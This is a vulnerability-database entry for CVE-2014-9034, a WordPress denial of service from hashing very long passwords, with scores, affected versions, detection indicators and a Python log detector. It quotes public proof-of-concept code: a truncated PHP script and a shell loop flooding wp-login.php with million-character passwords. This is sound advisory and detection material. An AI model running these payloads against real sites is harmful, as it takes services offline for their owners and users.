CVE-2014-9034
Published 2014-11-25
CVSS 2.0: 5.0 (medium), vector AV:N/AC:L/Au:N/C:N/I:N/A:P
Public exploit available
EPSS: 83.16% (99.6th percentile)
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
Affected (15 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < 4.0.1+dfsg-1 (bookworm) | 4.0.1+dfsg-1 (bookworm) |
| wordpress | wordpress | <= 3.7.4 | — |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
Detection & IOCs (extracted from sources)

Command used by the public PoC: for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
- Detect DoS attempts by monitoring for POST requests to /wp-login.php with extremely large password field values (e.g., 1,000,000 characters/bytes), which trigger excessive CPU consumption in the phpass hashing routine.
- Alert on high-frequency concurrent POST requests to /wp-login.php from the same source IP, consistent with the exploit pattern of spawning ~150 parallel curl requests with short sleep intervals.
- Flag POST requests to /wp-login.php where the Content-Length or body size exceeds a reasonable threshold (e.g., >4096 bytes), as the attack relies on submitting a password of up to 1,000,000 characters.
- Monitor for the legacy/suspicious User-Agent string used in the PHP-based PoC exploit when targeting wp-login.php.
- A spike in CPU consumption on the WordPress server correlating with bursts of login POST requests is a key behavioral indicator of this DoS vulnerability being exploited.
- The vulnerability exists specifically in wp-includes/class-phpass.php and affects WordPress versions before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1. Detection rules should be scoped to unpatched instances.
- The exploit can be performed with a valid WordPress user account, meaning authentication-based rate limiting alone is insufficient: the attack succeeds before the password is validated.
- The PHP-based PoC uses curl_multi to send concurrent requests in a loop, meaning the attack traffic may appear distributed across multiple handles from a single process, potentially evading simple per-connection rate limits.
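The two traffic-level indicators above (oversized login bodies and bursts of login POSTs from one source) as detection logic run over a constructed log sample. This is an added example, not code from the original page or from any of the cited sources; the log format, the field names and the burst thresholds are assumptions.

```python
"""Log-based detection for the CVE-2014-9034 traffic patterns listed above.
Added example; assumes a constructed log format of
<client_ip> <unix_time> "<method> <path>" <request_content_length>.
Standard combined access logs record the response size, not the request
body, so a custom log format or a WAF/reverse-proxy log is needed here."""
import re
from collections import defaultdict

LOGIN_PATH = "/wp-login.php"
MAX_BODY = 4096        # bytes; the threshold from the detection note above
BURST_COUNT = 20       # this many login POSTs from one IP ...
BURST_WINDOW = 10.0    # ... inside this many seconds is treated as a burst

LINE_RE = re.compile(r'^(\S+) (\d+(?:\.\d+)?) "(\w+) (\S+)" (\d+)$')

def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, ts, method, path, clen = m.groups()
    return {"ip": ip, "ts": float(ts), "method": method,
            "path": path.split("?", 1)[0], "clen": int(clen)}

def detect(lines):
    """Return (rule, ip, value) alerts for oversized login bodies and bursts."""
    alerts, recent, burst_alerted = [], defaultdict(list), set()
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        if ev["clen"] > MAX_BODY:
            alerts.append(("oversized_login_body", ev["ip"], ev["clen"]))
        window = recent[ev["ip"]]          # timestamps of recent login POSTs
        window.append(ev["ts"])
        while ev["ts"] - window[0] > BURST_WINDOW:   # slide the window
            window.pop(0)
        if len(window) >= BURST_COUNT and ev["ip"] not in burst_alerted:
            burst_alerted.add(ev["ip"])    # one burst alert per source IP
            alerts.append(("login_post_burst", ev["ip"], len(window)))
    return alerts

# Constructed sample: one normal login, one oversized password, and a burst
# of 30 oversized POSTs 0.25 s apart (the cadence of the public PoC).
SAMPLE_LOG = ['203.0.113.5 1000.0 "GET /wp-login.php" 0',
              '203.0.113.5 1001.0 "POST /wp-login.php" 180',
              '198.51.100.7 1002.0 "POST /wp-login.php" 1000150']
SAMPLE_LOG += ['192.0.2.9 %.2f "POST /wp-login.php" 1000150' % (1003 + i * 0.25)
               for i in range(30)]
```

Running `detect(SAMPLE_LOG)` yields one oversized-body alert for 198.51.100.7, thirty for 192.0.2.9, and a single burst alert for 192.0.2.9 once its twentieth POST lands inside the window.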
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | — | 5.0 | MEDIUM | — |
| vendor_debian | — | 5.0 | MEDIUM | — |
Debian
CVE-2014-9034 [MEDIUM]: wordpress - wp-includes/class-phpass.php (vendor_debian · 2014 · CVSS 5.0)
Scope: local
bookworm: resolved (fixed in 4.0.1+dfsg-1)
bullseye: resolved (fixed in 4.0.1+dfsg-1)
forky: resolved (fixed in 4.0.1+dfsg-1)
sid: resolved (fixed in 4.0.1+dfsg-1)
trixie: resolved (fixed in 4.0.1+dfsg-1)
GHSA
GHSA-wh45-5f5h-v3mq [MEDIUM]: wp-includes/class-phpass (ghsa_unreviewed · 2022-05-17 · CVSS 5.0)
OSV
CVE-2014-9034 [MEDIUM]: wp-includes/class-phpass (osv · 2014-11-25 · CVSS 5.0)
No detection rules found.
Exploit-DB
WordPress Core 4.0 - Denial of Service [MEDIUM] (exploitdb · 2014-12-01 · CVSS 5.0)

PHP PoC excerpt (truncated at both ends in the source):

```php
$argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");
$cookieFiles = "cookie.txt";
curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));
curl_multi_add_handle($multi, $ch);
$channels[$x] = $ch;
}
$active = null;
do {
$mrc = curl_multi_exec($multi, $active);
} while (
```
Exploit-DB
WordPress Core < 4.0.1 - Denial of Service (exploitdb · 2014-12-01)

Shell PoC excerpt (truncated at the start in the source):

```sh
valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
```

Perform a DoS with a valid user:

```sh
for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
```

Authors:
- Javer Nieto -- http://www.behindthefirewalls.com
- Andres Rojas -- http://www.devconsole.info

References:
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
* http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
* http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
References
* http://advisories.mageia.org/MGASA-2014-0493.html
* http://core.trac.wordpress.org/changeset/30467
* http://openwall.com/lists/oss-security/2014/11/25/12
* http://www.debian.org/security/2014/dsa-3085
* http://www.mandriva.com/security/advisories?name=MDVSA-2014:233
* http://www.securitytracker.com/id/1031243
* https://wordpress.org/news/2014/11/wordpress-4-0-1/